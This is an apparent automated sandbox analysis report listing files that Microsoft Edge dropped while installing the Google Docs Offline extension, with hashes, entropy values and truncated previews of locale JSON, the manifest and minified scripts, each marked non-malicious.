                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1063
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                        MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                        SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                        SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                        SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1333
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                        MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                        SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                        SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                        SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1263
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                        MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                        SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                        SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                        SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1074
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                        MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                        SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                        SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                        SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):879
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                        MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                        SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                        SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                        SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1205
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                        MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                        SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                        SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                        SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):843
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                        MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                        SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                        SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                        SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):912
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                        MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                        SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                        SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                        SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):11406
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                        MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                        SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                        SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                        SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):854
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                        MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                        SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                        SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                        SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2525
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                        MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                        SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                        SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                        SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):97
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                        MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                        SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                        SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                        SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):122218
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                        MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                        SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                        SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                        SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):291
